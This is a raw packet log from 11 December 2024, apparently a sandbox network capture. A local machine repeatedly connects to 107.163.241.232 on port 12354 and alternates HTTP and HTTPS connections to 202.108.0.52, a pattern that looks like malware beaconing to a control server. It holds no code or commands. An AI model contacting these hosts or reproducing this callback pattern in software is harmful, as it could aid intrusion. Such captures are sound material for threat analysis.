Dec 11, 2024 16:27:25.688440084 CET	12354	49935	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:25.721539974 CET	12354	49937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:25.721673012 CET	49937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.721906900 CET	49937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:25.723356962 CET	80	49898	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:25.723409891 CET	80	49938	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:25.723470926 CET	49898	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:25.723541021 CET	49938	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:25.727278948 CET	49938	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:25.841269970 CET	12354	49937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:25.846913099 CET	80	49938	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:27.294224024 CET	80	49938	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:27.294348001 CET	49938	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:27.674069881 CET	12354	49935	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:27.674201965 CET	49935	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.777317047 CET	49935	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.777951956 CET	49952	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.828757048 CET	12354	49937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:27.828871965 CET	49937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.844177961 CET	49937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.896716118 CET	12354	49935	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:27.897285938 CET	12354	49952	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:27.897347927 CET	49952	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.905407906 CET	49952	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:27.963402987 CET	12354	49937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:28.024766922 CET	12354	49952	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:28.311335087 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:28.311384916 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:28.311438084 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:28.311939955 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:28.311953068 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:28.323091030 CET	49959	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:28.442679882 CET	12354	49959	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:28.442756891 CET	49959	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:28.443994045 CET	49959	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:28.662744045 CET	12354	49959	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.006019115 CET	12354	49952	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.006443977 CET	49952	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.008563995 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.009145975 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.009366035 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.012433052 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.019423962 CET	49952	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.019828081 CET	49975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.023737907 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.023751020 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.024454117 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.024635077 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.071703911 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.115335941 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.138916016 CET	12354	49952	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.139377117 CET	12354	49975	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.139640093 CET	49975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.139930010 CET	49975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.259444952 CET	12354	49975	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.550407887 CET	12354	49959	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.550563097 CET	49959	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.550690889 CET	49959	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.552315950 CET	49984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.671438932 CET	12354	49959	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.671861887 CET	12354	49984	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.672029018 CET	49984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.672221899 CET	49984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:30.795793056 CET	12354	49984	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:30.889431000 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.889504910 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:30.889518976 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.889550924 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.892537117 CET	49958	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:30.892550945 CET	443	49958	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:31.042876005 CET	49938	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:31.047606945 CET	49990	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:31.164460897 CET	80	49938	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:31.164561987 CET	49938	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:31.168389082 CET	80	49990	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:31.168617964 CET	49990	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:31.168905020 CET	49990	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:31.291419983 CET	80	49990	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:31.897553921 CET	49990	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:31.897999048 CET	49984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:31.898000956 CET	49999	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:31.898010015 CET	49975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:32.011780024 CET	50001	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:32.013189077 CET	50002	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:32.018568993 CET	12354	49999	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:32.018696070 CET	49999	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:32.018913984 CET	49999	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:32.134579897 CET	80	50001	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:32.134651899 CET	50001	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:32.134852886 CET	50001	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:32.135983944 CET	12354	50002	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:32.136045933 CET	50002	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:32.139697075 CET	50002	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:32.141841888 CET	12354	49999	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:32.254098892 CET	80	50001	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:32.259016991 CET	12354	50002	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:33.704071045 CET	80	50001	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:33.704237938 CET	50001	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:33.706500053 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:33.706535101 CET	443	50022	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:33.706629038 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:33.706864119 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:33.706878901 CET	443	50022	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:34.129374981 CET	12354	49999	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.129463911 CET	49999	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.129513979 CET	49999	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.129883051 CET	50026	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.235275984 CET	12354	50002	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.235462904 CET	50002	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.240797997 CET	50002	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.248763084 CET	12354	49999	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.249284029 CET	12354	50026	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.249356985 CET	50026	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.249517918 CET	50026	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.261310101 CET	50029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.360081911 CET	12354	50002	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.369148970 CET	12354	50026	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.380970955 CET	12354	50029	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:34.381151915 CET	50029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.381196022 CET	50029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:34.500708103 CET	12354	50029	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:35.505661011 CET	443	50022	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:35.505757093 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:35.506175995 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:35.506184101 CET	443	50022	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:35.554063082 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:35.554075003 CET	443	50022	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:35.897233963 CET	50029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:35.897340059 CET	50022	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:35.897402048 CET	50026	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:35.897967100 CET	50048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:36.010611057 CET	50051	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:36.017280102 CET	12354	50048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:36.017396927 CET	50048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:36.017565012 CET	50048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:36.040678024 CET	50001	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:36.040940046 CET	50052	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:36.130614996 CET	12354	50051	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:36.130733967 CET	50051	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:36.131002903 CET	50051	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:36.136770010 CET	12354	50048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:36.160295010 CET	80	50052	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:36.160391092 CET	80	50001	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:36.160408974 CET	50052	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:36.160478115 CET	50001	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:36.160609961 CET	50052	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:36.250387907 CET	12354	50051	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:36.280611038 CET	80	50052	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:37.734524965 CET	80	50052	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:37.734618902 CET	50052	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:37.737065077 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:37.737107038 CET	443	50072	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:37.737324953 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:37.737627983 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:37.737642050 CET	443	50072	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:38.127370119 CET	12354	50048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.127664089 CET	50048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.127664089 CET	50048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.128299952 CET	50076	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.237402916 CET	12354	50051	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.237474918 CET	50051	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.237530947 CET	50051	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.247378111 CET	12354	50048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.247637987 CET	12354	50076	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.247726917 CET	50076	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.248204947 CET	50076	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.273233891 CET	50079	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.364243984 CET	12354	50051	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.368011951 CET	12354	50076	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.393212080 CET	12354	50079	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:38.393280983 CET	50079	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.393419981 CET	50079	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:38.515450001 CET	12354	50079	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:39.647505045 CET	443	50072	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:39.648406029 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:39.648861885 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:39.648880959 CET	443	50072	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:39.698055029 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:39.698085070 CET	443	50072	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:39.912971973 CET	50076	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:39.913029909 CET	50072	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:39.913106918 CET	50079	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:39.913631916 CET	50097	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:40.025984049 CET	50099	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:40.038974047 CET	12354	50097	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:40.039078951 CET	50097	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:40.039273024 CET	50097	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:40.062938929 CET	50052	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:40.063230991 CET	50100	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:40.145306110 CET	12354	50099	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:40.145481110 CET	50099	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:40.145740986 CET	50099	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:40.158776999 CET	12354	50097	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:40.182812929 CET	80	50052	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:40.182826042 CET	80	50100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:40.183032990 CET	50052	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:40.183069944 CET	50100	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:40.183289051 CET	50100	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:40.269056082 CET	12354	50099	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:40.303298950 CET	80	50100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:41.755991936 CET	80	50100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:41.756153107 CET	50100	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:41.763079882 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:41.763142109 CET	443	50121	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:41.763313055 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:41.763519049 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:41.763533115 CET	443	50121	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:42.145188093 CET	12354	50097	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.145322084 CET	50097	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.145406961 CET	50097	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.145984888 CET	50126	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.264763117 CET	12354	50097	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.265539885 CET	12354	50126	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.265645981 CET	50126	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.265783072 CET	50126	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.284392118 CET	12354	50099	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.284545898 CET	50099	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.284616947 CET	50099	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.285187006 CET	50128	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.385190010 CET	12354	50126	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.404184103 CET	12354	50099	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.405463934 CET	12354	50128	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:42.405530930 CET	50128	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.405708075 CET	50128	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:42.525182009 CET	12354	50128	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:43.482645988 CET	443	50121	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:43.482712030 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:43.483212948 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:43.483222008 CET	443	50121	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:43.485312939 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:43.485318899 CET	443	50121	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:43.928361893 CET	50128	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:43.928394079 CET	50126	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:43.928400040 CET	50121	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:43.929200888 CET	50148	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:44.049763918 CET	12354	50148	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:44.049865961 CET	50148	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:44.050100088 CET	50148	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:44.075828075 CET	50100	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:44.076252937 CET	50150	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:44.076708078 CET	50151	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:44.169517040 CET	12354	50148	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:44.195444107 CET	80	50100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:44.195519924 CET	50100	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:44.195547104 CET	80	50150	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:44.195760012 CET	50150	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:44.195864916 CET	50150	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:44.196033001 CET	12354	50151	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:44.196201086 CET	50151	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:44.196326971 CET	50151	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:44.315670967 CET	80	50150	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:44.315855026 CET	12354	50151	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:45.779295921 CET	80	50150	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:45.779421091 CET	50150	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:45.781826973 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:45.781878948 CET	443	50172	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:45.781980038 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:45.782279015 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:45.782294035 CET	443	50172	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:46.158941031 CET	12354	50148	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.159017086 CET	50148	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.159112930 CET	50148	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.159837961 CET	50177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.280332088 CET	12354	50148	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.281111002 CET	12354	50177	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.281640053 CET	50177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.281640053 CET	50177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.299945116 CET	12354	50151	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.300044060 CET	50151	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.300138950 CET	50151	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.300641060 CET	50179	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.405929089 CET	12354	50177	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.425004005 CET	12354	50151	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.425508022 CET	12354	50179	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:46.425980091 CET	50179	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.425981045 CET	50179	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:46.632316113 CET	12354	50179	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:47.465980053 CET	443	50172	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:47.466217995 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:47.466502905 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:47.466515064 CET	443	50172	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:47.468369007 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:47.468374968 CET	443	50172	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:48.053486109 CET	50179	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.053529024 CET	50172	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:48.053544998 CET	50177	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.054388046 CET	50203	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.173748970 CET	12354	50203	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:48.173846960 CET	50203	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.174108982 CET	50203	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.202503920 CET	50205	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.203013897 CET	50150	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:48.203224897 CET	50206	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:48.293380022 CET	12354	50203	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:48.413899899 CET	12354	50205	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:48.413924932 CET	80	50206	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:48.413934946 CET	80	50150	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:48.413979053 CET	50205	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.414020061 CET	50150	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:48.414032936 CET	50206	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:48.414263964 CET	50205	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:48.414283991 CET	50206	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:48.535094023 CET	12354	50205	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:48.535110950 CET	80	50206	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:49.984549999 CET	80	50206	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:49.988353968 CET	50206	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:49.991364002 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:49.991401911 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:49.991497993 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:49.991766930 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:49.991782904 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:50.284112930 CET	12354	50203	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.284178972 CET	50203	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.284270048 CET	50203	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.284713030 CET	50233	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.403964996 CET	12354	50203	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.404395103 CET	12354	50233	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.404457092 CET	50233	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.404706955 CET	50233	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.525613070 CET	12354	50233	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.534209967 CET	12354	50205	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.534286976 CET	50205	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.534367085 CET	50205	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.534759045 CET	50237	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.654490948 CET	12354	50205	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.654810905 CET	12354	50237	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:50.654900074 CET	50237	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.716801882 CET	50237	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:50.836185932 CET	12354	50237	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:51.685381889 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:51.685513973 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:52.177037001 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:52.177061081 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:52.183726072 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:52.183732033 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:52.212728977 CET	50237	12354	192.168.2.7	107.163.241.232
